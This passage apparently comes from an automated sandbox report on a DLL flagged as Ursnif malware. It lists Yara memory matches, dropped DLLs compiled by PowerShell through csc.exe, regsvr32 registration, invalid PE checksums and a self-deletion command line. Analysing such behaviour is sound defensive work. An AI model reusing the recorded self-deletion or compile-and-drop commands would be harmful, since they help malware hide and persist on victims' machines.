Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120880 push dword ptr [ebp-00000284h]; ret	4_2_011208B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_011206F5 push dword ptr [ebp-00000284h]; ret	4_2_01120764
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120AB8 push edx; ret	4_2_01120B11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120BFC push dword ptr [esp+0Ch]; ret	4_2_01120C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120BFC push dword ptr [esp+10h]; ret	4_2_01120C56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120A64 push edx; ret	4_2_01120B11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120A64 push dword ptr [esp+10h]; ret	4_2_01120BFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC7347 push ecx; ret	4_2_05EC7357
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01057D50 push ecx; ret	5_2_01057D59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010580BF push ecx; ret	5_2_010580CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB06F5 push dword ptr [ebp-00000284h]; ret	5_2_00EB0764
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0AB8 push edx; ret	5_2_00EB0B11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0880 push dword ptr [ebp-00000284h]; ret	5_2_00EB08B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0A64 push edx; ret	5_2_00EB0B11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0A64 push dword ptr [esp+10h]; ret	5_2_00EB0BFB

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_046D653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_046D653E

PE file contains an invalid checksum

Source: sjfy431f.dll.25.dr	Static PE information: real checksum: 0x0 should be: 0x5cc9
Source: 61f113091fd0c.dll	Static PE information: real checksum: 0x10f3d0 should be: 0x103870
Source: tpt0a0ul.dll.34.dr	Static PE information: real checksum: 0x0 should be: 0x3700
Source: oyq1c2cj.dll.27.dr	Static PE information: real checksum: 0x0 should be: 0xd902
Source: pwlcj2cu.dll.46.dr	Static PE information: real checksum: 0x0 should be: 0xd21c
Source: pqvogmwc.dll.45.dr	Static PE information: real checksum: 0x0 should be: 0x217c
Source: oeprcmty.dll.41.dr	Static PE information: real checksum: 0x0 should be: 0x740b
Source: ugg3o5nf.dll.33.dr	Static PE information: real checksum: 0x0 should be: 0x6d4b
Source: 0hsihch1.dll.39.dr	Static PE information: real checksum: 0x0 should be: 0x34a3

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline

Persistence and Installation Behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\pqvogmwc.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\sjfy431f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\0hsihch1.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\oeprcmty.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Self deletion via cmd delete

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
